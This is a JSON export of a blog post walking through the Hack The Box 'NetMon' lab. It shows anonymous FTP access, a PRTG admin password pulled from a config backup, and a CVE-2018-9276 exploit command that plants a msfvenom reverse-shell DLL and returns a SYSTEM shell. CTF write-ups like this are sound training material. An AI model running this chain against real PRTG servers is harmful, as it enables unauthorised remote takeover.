{"id":60,"date":"2021-02-13T19:19:14","date_gmt":"2021-02-13T19:19:14","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=60"},"modified":"2021-02-13T19:30:25","modified_gmt":"2021-02-13T19:30:25","slug":"htb-netmon-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/13\/htb-netmon-walkthrough\/","title":{"rendered":"HTB &#8211; NetMon Walkthrough"},"content":{"rendered":"\n<p>nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/UR9PVxor9D3w3KrKxT-BKiBsLDZBCEfeGPZvkZaac5bb9QfMvnaqkqd__3dAyWT8jKO5YBNxo_q5Ztqx7CCFkpEWktnIqITILg14WSL7SMRV2e2orom2uXVxvZvdYtb3X_I1Kv2r\" alt=\"nmap output: 21\/tcp open ftp Microsoft ftpd (anonymous FTP login allowed, FTP code 230; SYST: Windows NT); 80\/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor), http-title Welcome | PRTG Network Monitor (NETMON); 135\/tcp open msrpc Microsoft Windows RPC; 139\/tcp open netbios-ssn; 445\/tcp open microsoft-ds; OS: Windows Server 2008 R2 - 2012\"\/><\/figure>\n\n\n\n<p>Anonymous FTP<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/DV4jTvF8VAzoi2wjTQ34NDTudjC0y4v1iVaB7VKK6A2r8UhdKS0Iz3wdJ1dXXZKCNddyarhiAtFKnR4qYwsflt1rXkn5atzD-TlN4msbo7s7U3DHvl708FTYNvJowBnk1DkOPQ2V\" alt=\"ftp&gt; ls -la in the anonymous FTP session lists the C: drive root ($RECYCLE.BIN, .rnd, bootmgr, BOOTNXT, Documents and Settings, inetpub, pagefile.sys, PerfLogs, Program Files, Program Files (x86), ProgramData, Recovery, System Volume Information, Users, Windows), then ftp&gt; cd ProgramData\"\/><\/figure>\n\n\n\n<p>PRTG files are under C:\\ProgramData\\Paessler\\PRTG Network Monitor<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/UoC4DuwKmHglOoe66ZLNVAnJQ9nWQ7Ug7YieI67VjtAPouXFbqsnyuCYmTvkVVuvmNIpDUgCEkHoAoYPRtjkgFpZ7VtUuFuPI3J2knDXwpUrbOst1mgAkqkzKrzZyvdIXND4XmgH\" alt=\"ftp&gt; cd ProgramData, ftp&gt; cd Paessler, ftp&gt; cd &quot;PRTG Network Monitor&quot;; ls shows Configuration Auto-Backups, Log Database, Logs (Debug), Logs (Sensors), Logs (System), Logs (Web Server), Monitoring Database, PRTG Configuration.dat, PRTG Configuration.old\"\/><\/figure>\n\n\n\n<p>Looking for a password in the configuration backup<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/zXb3Nl_rZ8U6miY5OQNTg6SYCHOPA6jOcF0rHYeLQkYmX0aN08b5ULR3sITQJJrlgdcN3eSdZS41Q2pLKwv4TZgZHmi9GTDMBi-fnQDHXvVXgefHl54iQkoN9ZDiasQyal9ItCPV\" alt=\"cat &quot;PRTG Configuration.old.bak&quot; | grep -C 3 prtgadmin: the &lt;dbpassword&gt; element holds PrTg@dmin2018 for user prtgadmin (PRTG System Administrator)\"\/><\/figure>\n\n\n\n<p>The installed PRTG version (18.1.37.13946) is vulnerable to CVE-2018-9276.<\/p>\n\n\n\n<p>Use the following exploit:<\/p>\n\n\n\n<p><a href=\"https:\/\/raw.githubusercontent.com\/wildkindcc\/CVE-2018-9276\/master\/CVE-2018-9276.py\">https:\/\/raw.githubusercontent.com\/wildkindcc\/CVE-2018-9276\/master\/CVE-2018-9276.py<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/gnzVx5Ei3WO_nD55okGSgyAKn7-5sKbhWd3Z48i-VbAXJX5RthtXI5YVzPLKRAq330Fn39JQ2MD5ltPltogpuEk5vZweS0c2Opz315ozhp9in7zLjnf0HKjHtMAP4m0Ow5b1wfgL\" alt=\"python CVE-2018-9276.py -i 10.10.10.152 -p 80 --lhost 10.10.14.13 --lport 8888 --user prtgadmin --password PrTg@dmin2019: reports PRTG\/18.1.37.13946 as vulnerable, obtains a session as prtgadmin, stages a notification (objid 2018) that places a msfvenom DLL payload (LHOST=10.10.14.13 LPORT=8888, 324-byte payload, 5120-byte DLL), stages a second notification (objid 2019) to run it, and listens on 10.10.14.13:8888 for the reverse shell\"\/><\/figure>\n\n\n\n<p>I got NT Authority\\System<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/SPhoo60NmoktgZ7IPhYvQ_j_0wljW_N634VvVHYPRsivxZA5uJIMsk4sSG21Pb9oMYisME63e4a7zV_Nm4NzP5BAv9nk0_nVz686Rqm1--oAnmF4DmnE-Xw-AJRlNBwKoBUXGbVF\" alt=\"Incoming connection from 10.10.10.152 on port 8888; Microsoft Windows [Version 10.0.14393]; whoami returns nt authority\\system\"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>nmap Anonymous FTP PRTG files are under C:\\ProgramData\\Paessler\\PRTG Network Monitor Looking for a password in the configuration backup The installed PRTG version (18.1.37.13946) is vulnerable to CVE-2018-9276. Use the following exploit: https:\/\/raw.githubusercontent.com\/wildkindcc\/CVE-2018-9276\/master\/CVE-2018-9276.py I got NT Authority\\System<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/60"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=60"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/60\/revisions"}],"predecessor-version":[{"id":61,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/60\/revisions\/61"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=60"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=60"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=60"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}